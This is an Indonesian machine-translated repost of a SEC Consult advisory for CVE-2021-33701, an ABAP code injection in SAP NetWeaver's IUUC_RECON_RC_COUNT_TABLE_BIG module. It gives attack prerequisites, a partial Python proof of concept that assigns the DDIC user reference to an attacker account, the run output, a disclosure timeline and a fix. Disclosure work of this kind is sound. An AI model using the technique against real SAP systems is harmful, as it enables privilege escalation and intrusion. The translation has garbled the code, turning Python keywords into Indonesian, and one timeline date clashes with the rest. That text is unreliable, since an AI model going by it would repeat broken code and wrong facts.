Injeksi Kode ABAP SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG

  • Whatsapp
Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Cadangan
Sistem Manajemen Pasien Chikitsa Eksekusi Kode Jarak Jauh Cadangan

News.nextcloud.asia

SEC Konsultasikan Vulnerability Lab Security Advisory < 20211214-1 >
================================================== =======================
judul: Injeksi Kode ABAP Jarak Jauh di SAP IUUC_RECON_RC_COUNT_TABLE_BIG
produk: SAP Netweaver
versi rentan: SAP DMIS 2011_1_731 SP 0013
versi tetap: lihat bagian solusi di bawah
Nomor CVE: CVE-2021-33701
Catatan SAP: 3078312
dampak: Kritis
Skor CVSS 3.1: 9.1
CVSS 3.1 Vektor: CVSS: 3.0 / AV: N / AC: L / PR: H / UI: N / S: C / C: H / I: H / A: H
beranda: https://www.sap.com/
ditemukan: 2021-07-16
oleh: Raschin Tavakoli (Kantor Wina)
SEC Konsultasikan Vulnerability Lab

Bagian terintegrasi dari SEC Consult, sebuah perusahaan Atos
Eropa | Asia | Amerika Utara

https://www.sec-consult.com

================================================== =======================

Deskripsi penjual:
——————-
SAP SE adalah perusahaan perangkat lunak multinasional Jerman yang berbasis di Walldorf,
Baden-Württemberg, yang mengembangkan perangkat lunak perusahaan untuk mengelola bisnis
operasi dan hubungan pelanggan. Perusahaan ini terkenal dengan ERP-nya
perangkat lunak. SAP adalah perusahaan perangkat lunak non-Amerika terbesar berdasarkan pendapatan,
perusahaan perangkat lunak publik terbesar ketiga di dunia berdasarkan pendapatan, dan
perusahaan Jerman terbesar berdasarkan kapitalisasi pasar.”

Sumber: https://en.wikipedia.org/wiki/SAP

Rekomendasi bisnis:
————————
SAP® merilis patch (SNote 3078312) dan SEC Consult menyarankan semua SAP®
pelanggan untuk memperbarui sistem mereka segera.

Analisis keamanan mendalam yang dilakukan oleh profesional keamanan adalah
sangat disarankan, karena perangkat lunak mungkin terpengaruh dari masalah keamanan lebih lanjut.

Ikhtisar/deskripsi kerentanan:
———————————–
1. Injeksi Kode ABAP Jarak Jauh di SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)

Parameter IT_WHERE_CLAUSE dari modul fungsi
IUUC_RECON_RC_COUNT_TABLE_BIG rentan terhadap Injeksi Kode ABAP.
Masukan pengguna yang tidak difilter digunakan untuk menghasilkan kode ABAP secara dinamis melalui
GENERATE SUBROUTINE pernyataan yang kemudian dieksekusi dengan PERFORM
penyataan. Sebagai penyerang dapat dengan bebas memilih karakter yang dapat digunakan
di bidang ini, ia dapat mengeksekusi kode ABAP sewenang-wenang.

Karena modul fungsi yang terpengaruh diaktifkan dari jarak jauh, ini memungkinkan penyerang untuk
melakukan serangan jarak jauh melalui RFC.

Perhatikan bahwa bagian kode yang rentan di dalam modul fungsi telah diubah
dalam rilis yang lebih baru. Kode asli yang rentan terhadap Kode ABAP
Injeksi telah diganti dengan panggilan driver ADBC. Sayangnya, ini
perubahan juga memperkenalkan kerentanan injeksi SQL, yang dibahas dalam
SCatatan 3078312.

Masalah ini telah dilaporkan dalam penasihat Konsultasi SEC terpisah dan dapat dilihat
di URL berikut:

https://sec-consult.com/vulnerability-lab/advisory/remote-adbc-sql-injection-in-sap-netweaver

Prasyarat Serangan
——————–
1. Injeksi Kode ABAP Jarak Jauh di SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)

Prasyarat pertama adalah objek otorisasi S_DMIS (Migrasi data SAP SLO
server) dengan setidaknya pengaturan berikut:

MBT_PR_ARE: Transformasi Lanskap SAP
MBT_PR_LEV: (tidak perlu disetel)
ACTVT: 03 Tampilan

Perhatikan bahwa itu adalah praktik umum bahwa objek otorisasi (salah) dikonfigurasi
dengan wildcard, yang meningkatkan kemungkinan kerentanan.

Selanjutnya, tentu saja, otorisasi untuk melakukan panggilan fungsi (S_RFC) harus
diberikan.

Dalam sebagian besar kasus, komunikasi RFC internal saat ini masih ditemukan
menjadi tidak terenkripsi. Ini meningkatkan risiko bahwa penyerang menyadap DMIS terkait
kata sandi akun. Setelah pengguna tersebut dibajak, penyerang telah mendapatkan semua
prasyarat yang diperlukan untuk serangan lebih lanjut seperti yang dijelaskan dalam nasihat ini.

Bukti dari konsep:
—————–
1. Injeksi Kode ABAP Jarak Jauh di SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)

Sebagai bukti konsep, sebuah skrip dibuat yang menugaskan penyerang itu sendiri
referensi pengguna DDIC di dalam tabel REFUSER:

* ************************************************* **************************** *
#!/usr/bin/env python3
dari Koneksi impor pyrfc

jika __name__ == ‘__main__’:

mandt = {‘000’, ‘001’} # dipilih untuk tujuan demonstrasi
samb = Koneksi(ashost=”XX.XX.XX.XX”, sysnr=”00″, klien=”001″,
user=”DEVELOPER”, passwd=”Sap123456″, lang=’EN’)

print(“USREFUS sebelumnya:”)
hasil = conn.call(‘RFC_READ_TABLE’,
QUERY_TABLE=’USREFUS’,
BIDANG =[‘MANDT’, ‘BNAME’, ‘REFUSER’],
DELIMITER=’|’
)
kolom_nilai = []

untuk baris dalam hasil[‘DATA’]:
cetak (baris)[‘WA’])

[ — PoC partially removed — ]

print(“nMengirim muatan …n”)

hasil = conn.call(‘RFC_READ_TABLE’,
QUERY_TABLE=’USREFUS’,
BIDANG =[‘MANDT’, ‘BNAME’, ‘REFUSER’],
DELIMITER=’|’
)
kolom_nilai = []

print(“USREFUS setelah:”)
untuk baris dalam hasil[‘DATA’]:
cetak (baris)[‘WA’])
* ************************************************* **************************** *

Menjalankan kode menghasilkan output berikut:

$> iuuc_generic_abap.py
USREFUS sebelumnya:
001|PENGEMBANG |
001|BWDEVELOPER |
001|UJI |
001 | E_TEST |
001 | DDIC |
001|SAP* |

Mengirim muatan…

USREFUS setelah:
001|BWDEVELOPER |
001|UJI |
001 | E_TEST |
001 | DDIC |
001|SAP* |
001|PENGEMBANG |DDIC

Versi yang rentan/teruji:
—————————–
Kerentanan ini telah diuji pada SAP Netweaver 752, 0001 (SP-Level),
SAPK-11616INDMIS (Paket Dukungan) SAP DMIS 2011_1_731.

Garis waktu kontak vendor:
————————
2021-07-18: Menghubungi Tim Tanggapan Keamanan Produk SAP melalui Portal Web
https://www.sap.com/about/trust-center/security/incident-management.html
ID SR-21-00018 telah ditetapkan
2021-07-21: Vendor menginformasikan bahwa diskusi telah dilakukan hingga
tim aplikasi
2022-07-21: Vendor mengonfirmasi kerentanan tetapi menandainya secara internal sebagai duplikat
untuk CVE-2021-33701 (lihat saran kami yang lain untuk modul fungsi ini)
2021-11-17: SEC Consult mengirimkan nasihat akhir kepada vendor dan menginformasikan tentang rilis
tanggal
2021-12-14: Rilis terkoordinasi dari penasihat keamanan

Larutan:
———
SEC Consult menyarankan semua pelanggan SAP® untuk menerapkan SAP Security Note
3078312 segera. Perhatikan bahwa Catatan Keamanan 3078312 tidak berisi otomatis
instruksi koreksi untuk pelanggan yang menjalankan sistem dengan versi DMIS atau
Tingkat Paket Dukungan lebih rendah dari DMIS 2011 SP10 (2015). Silakan merujuk ke
solusi bagian.

Solusi:
———–
Di level SP yang lebih rendah, koreksi dapat diterapkan secara manual dengan memodifikasi
modul fungsi IUUC_RECON_RC_COUNT_TABLE_BIG menambahkan pernyataan berikut:
langsung setelah pemeriksaan otorisasi:

ASSERT it_where_clause[] ADALAH AWAL.

URL Saran:
————-
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~

SEC Konsultasikan Vulnerability Lab

SEC Consult, sebuah perusahaan Atos
Eropa | Asia | Amerika Utara

Tentang SEC Konsultasikan Vulnerability Lab
SEC Consult Vulnerability Lab merupakan bagian terintegrasi dari SEC Consult, dan
perusahaan Atos. Ini memastikan perolehan pengetahuan lanjutan dari SEC Consult di
bidang keamanan jaringan dan aplikasi untuk tetap berada di depan penyerang. Itu
SEC Consult Vulnerability Lab mendukung pengujian penetrasi berkualitas tinggi dan
evaluasi teknologi ofensif dan defensif baru untuk pelanggan kami.
Oleh karena itu, pelanggan kami mendapatkan informasi terbaru tentang kerentanan
dan rekomendasi yang valid tentang profil risiko teknologi baru.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
Tertarik untuk bekerja dengan para ahli dari SEC Consult?
Kirimkan aplikasi Anda kepada kami https://sec-consult.com/career/

Tertarik untuk meningkatkan keamanan siber Anda dengan para ahli dari SEC Consult?
Hubungi kantor lokal kami https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~

Mail: riset di sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Raschin Tavakoli / @ 2021

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.